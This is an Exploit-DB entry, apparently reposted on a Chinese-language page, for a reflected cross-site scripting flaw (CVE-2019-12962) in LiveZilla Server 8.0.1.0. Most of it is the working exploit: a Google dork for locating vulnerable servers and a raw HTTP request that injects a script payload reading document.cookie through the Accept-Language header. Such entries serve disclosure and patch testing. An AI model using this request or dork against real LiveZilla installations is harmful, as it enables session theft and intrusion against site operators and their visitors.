LiveZilla Server 8.0.1.0 – ‘Accept-Language’ Reflected XSS

  • 作者: Clément Cruchet
    日期: 2021-03-19
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/49669/
  • # Exploit Title: LiveZilla Server 8.0.1.0 - 'Accept-Language' Reflected XSS
    # Google Dork: inurl: inurl:/mobile/index.php intitle:LiveZilla
    # Date: 18 Mars 2021
    # Exploit Author: Clément Cruchet
    # Vendor Homepage: https://www.livezilla.net
    # Software Link: https://www.livezilla.net/downloads/en/
    # Version: LiveZilla Server 8.0.1.0 and before
    # Tested on: Windows/Linux
    # CVE : CVE-2019-12962
    
    GET /mobile/index.php HTTP/1.1
    Host: chat.website.com
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: ';alert(document.cookie)//
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: close
    Upgrade-Insecure-Requests: 1